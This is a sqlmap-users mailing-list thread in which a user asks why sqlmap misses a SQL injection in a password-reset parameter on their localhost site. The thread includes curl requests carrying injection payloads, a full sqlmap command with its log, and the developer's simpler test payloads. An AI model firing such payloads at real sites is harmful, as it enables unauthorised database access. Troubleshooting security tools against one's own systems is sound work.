sqlmap-users

[sqlmap-users] sqlmap wont find an "AND boolean/time" based sqli

[cats <du...@al...>]

Ok so I know that my site has an sqli (and boolean/mysql time based).
I even tried both of them myself and the results are very clear and
simple, yet sqlmap doesn't seem to see it. It can find the time based at
first, but it always ends up saying that it's a false positive.

cURL will give me the following result from the page, using "and boolean
based sqli" with a true statement:

curl --data "lostpass=1'%20OR 1=1 AND 1='1"
http://localhost/account/index.php

<div class='message' style='padding:10px;'>Your password was e-mailed to
1' OR 1='1</div>


And now a false one

curl --data "lostpass=1' OR 1=1 AND 1='2"
http://localhost/account/index.php


<td class='message'>The email address you entered 1' OR 1=1 AND 1='2
does not exist</p>


I have tried with --string and --text-only with sqlmap, but I get the
same results over and over. Here's some sample output:

python sqlmap.py -u "http://localhost/account/index.php" --random-agent
--data="lostpass=1' OR 1='1" --string="Your password was e-mailed to"
--text-only --delay=5 --technique=TB


[16:57:34] [INFO] testing connection to the target url
[16:57:49] [INFO] heuristics detected web page charset 'ascii'
[16:57:50] [INFO] testing if the provided string is within the target
URL page content
[16:57:56] [INFO] testing if POST parameter 'lostpass' is dynamic
[16:58:05] [INFO] confirming that POST parameter 'lostpass' is dynamic
[16:58:13] [INFO] POST parameter 'lostpass' is dynamic
[16:58:19] [WARNING] heuristic test shows that POST parameter 'lostpass'
might not be injectable
[16:58:19] [INFO] testing sql injection on POST parameter 'lostpass'
[16:58:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
clause'
[16:59:21] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[17:00:48] [INFO] POST parameter 'lostpass' is 'MySQL > 5.0.11 AND
time-based blind' injectable 
[17:00:48] [INFO] checking if the injection point on POST parameter
'lostpass' is a false positive
[17:03:09] [WARNING] false positive injection point detected
[17:03:09] [WARNING] POST parameter 'lostpass' is not injectable
[17:03:09] [CRITICAL] all parameters appear to be not injectable.

I tried with a sleep(5) injection manually as well, and it works like a
charm. Any ideas?

Re: [sqlmap-users] sqlmap wont find an "AND boolean/time" based sqli

[Miroslav S. <mir...@gm...>]

Hi.

This looks strange:
1'%20OR 1=1 AND 1='1

and
1' OR 1=1 AND 1='2

Could you please try to find the simplest vectors/payloads that work, e.g.:
1' AND '1'='1
1' AND '1'='2

>From this payloads I am not sure why is there OR 1=1 and how is this
evaluated to True or False (as OR 1=1 should evaluate in normal cases to
True in both vectors you've sent)

Kind regards

On Sat, Jan 7, 2012 at 5:10 PM, cats <du...@al...> wrote:

> Ok so I know that my site has an sqli (and boolean/mysql time based).
> I even tried both of them myself and the results are very clear and
> simple, yet sqlmap doesn't seem to see it. It can find the time based at
> first, but it always ends up saying that it's a false positive.
>
> cURL will give me the following result from the page, using "and boolean
> based sqli" with a true statement:
>
> curl --data "lostpass=1'%20OR 1=1 AND 1='1"
> http://localhost/account/index.php
>
> <div class='message' style='padding:10px;'>Your password was e-mailed to
> 1' OR 1='1</div>
>
>
> And now a false one
>
> curl --data "lostpass=1' OR 1=1 AND 1='2"
> http://localhost/account/index.php
>
>
> <td class='message'>The email address you entered 1' OR 1=1 AND 1='2
> does not exist</p>
>
>
> I have tried with --string and --text-only with sqlmap, but I get the
> same results over and over. Here's some sample output:
>
> python sqlmap.py -u "http://localhost/account/index.php" --random-agent
> --data="lostpass=1' OR 1='1" --string="Your password was e-mailed to"
> --text-only --delay=5 --technique=TB
>
>
> [16:57:34] [INFO] testing connection to the target url
> [16:57:49] [INFO] heuristics detected web page charset 'ascii'
> [16:57:50] [INFO] testing if the provided string is within the target
> URL page content
> [16:57:56] [INFO] testing if POST parameter 'lostpass' is dynamic
> [16:58:05] [INFO] confirming that POST parameter 'lostpass' is dynamic
> [16:58:13] [INFO] POST parameter 'lostpass' is dynamic
> [16:58:19] [WARNING] heuristic test shows that POST parameter 'lostpass'
> might not be injectable
> [16:58:19] [INFO] testing sql injection on POST parameter 'lostpass'
> [16:58:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
> clause'
> [16:59:21] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
> [17:00:48] [INFO] POST parameter 'lostpass' is 'MySQL > 5.0.11 AND
> time-based blind' injectable
> [17:00:48] [INFO] checking if the injection point on POST parameter
> 'lostpass' is a false positive
> [17:03:09] [WARNING] false positive injection point detected
> [17:03:09] [WARNING] POST parameter 'lostpass' is not injectable
> [17:03:09] [CRITICAL] all parameters appear to be not injectable.
>
> I tried with a sleep(5) injection manually as well, and it works like a
> charm. Any ideas?
>
>
>
>
>
>
>
>
> ------------------------------------------------------------------------------
> Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex
> infrastructure or vast IT resources to deliver seamless, secure access to
> virtual desktops. With this all-in-one solution, easily deploy virtual
> desktops for less than the cost of PCs and save 60% on VDI infrastructure
> costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar
http://about.me/stamparm